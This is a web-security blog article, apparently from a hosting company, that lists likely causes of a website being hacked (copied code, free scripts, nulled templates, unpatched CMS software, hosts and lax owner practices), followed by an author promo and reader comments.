Business Security Web Development

When Your Website Gets Hacked, Whose Fault Is It?

Image courtesy of (Stuart Miles) /

Many website owners are livid when their websites are defaced or hacked and a message is put up by the hackers. They are panicked and angry: Who could it be? Why me? How did they enter? What did I miss? Whose fault is it?

These are all common questions that come up when an incident occurs. This article discusses the possible reasons which caused your website to be compromised and how to deal with them.

Your Designer

Many website designers claim to know a lot about designing and website development, but simply know how to copy designs and layouts and make them fit in with your website.

While trying to put in transitions and effects to your website elements, they most often copy code or boilerplate templates from free websites or previous projects. These code snippets have rarely been tested and no due diligence has been done to ensure their integrity. Many a time even prominent encoded malware is slipped into the code, which very few designers really understand.

Your Coder / Programmer

Just like the design aspect, even many coders and programmers are known to lift code from various sample websites, to match the taste of their client. Little do they realize that they are exposing their work to direct threats which are constantly waiting for easy prey. Code for menus, slideshows, sidebars, contact forms and even chat applications could be laced with malicious code, which may either give control of the website and hosting account to an outsider or cause some automated scripts to run on the website. A client of ours was very surprised that all enquiries from his contact form were visible on a business forum. When he tested out the form, he realized that the form was auto-posting the results to the forum and suspected that the coder had played mischief. When he contacted the coder, the coder admitted to having used a free contact form script due to some special features. When a security professional inspected the code, he discovered that not only were the contacts being posted to the forum, but they were also being copied to an obscure e-mail address.

Your Template

All of us are drawn into template-based systems, due to their quick setup turnaround time and ease of use. But many people don’t want to pay the template designers for their efforts and would prefer to buy pirated or nulled versions of the same paid templates. There is always a price for cutting corners and in this case, the price can be quite large. Those who distribute nulled versions for free often want some quid pro quo and add their own code or scripts to the templates, so that they also benefit from your using the template. Popup ads, banners, redirects, silent copying of your content and even mass mailing scripts are all part and parcel of using a stolen template.

The CMS System

The CMS System that you use also plays an important part in ensuring that your website content remains safe. Numerous vulnerabilities are found everyday across various open source and paid CMS systems. Not patching these vulnerabilities and not applying frequent updates to them increases your chances of being attacked by serial attackers who are specifically targeting your type of website system.

Your Hosting Company

It is also possible that the systems of your Hosting Company is infected and the malware or virus is spreading through their network. Although the chances of this are low, this can be easily determined by inspecting the logs of the hosting account. If the damage was done through a super user, then it is necessary to get the entire server and network checked up.

Your Own Fault

More often than not, the website owner or webmaster or admin is at fault for doing or not doing something at the right time and right place. Setting permissions too loosely, using plan text passwords in code and even allowing users to upload to a system folder are all ways in which the admin is responsible for getting the website into trouble.

About the author


Alex HD

Get an Unlimited Hosting Plan at the best prices only at HostingXtreme. We offer affordable value-for-moneyservices. To know more, visit our website at


Click here to post a comment
  • Nice article. Informative and concise. The only thing missing is an explanation of the actors. Most ‘owners’ don’t know the difference between designer, coder, programmer, webmaster, etc.

  • My website was hacked several times. I was amazed at why someone would hack my site. But your post helped me to understand the purpose. Thank you very much for this post. 😀

  • Just goes to prove – you get what you pay for.

    If you want something free/on the cheap, then don’t expect your website to be bullet proof. Professional web developers/programmers KNOW the language(s) the website is coded in and the technologies behind them – so that, even if they do use templates for speed, they’re able to “lift the lid” and understand all that’s going on under the hood. It’s here where professional qualifications/certifications come into their own – as the person holding them, has been tested in exam-like conditions (no cheat sheets/books/Internet etc. to fall back on).

  • For 20 years now I am a senior information security consultant owner of egroup Services. Well, I would agree with all the information above. However, if a case ends up in court every person within the cycle of a web project mentioned would cover up.Please understand, is best to outsource Info. Sec. of your web site. Ever since I did for all my customers I sleep better…
    CEO – Egroup Services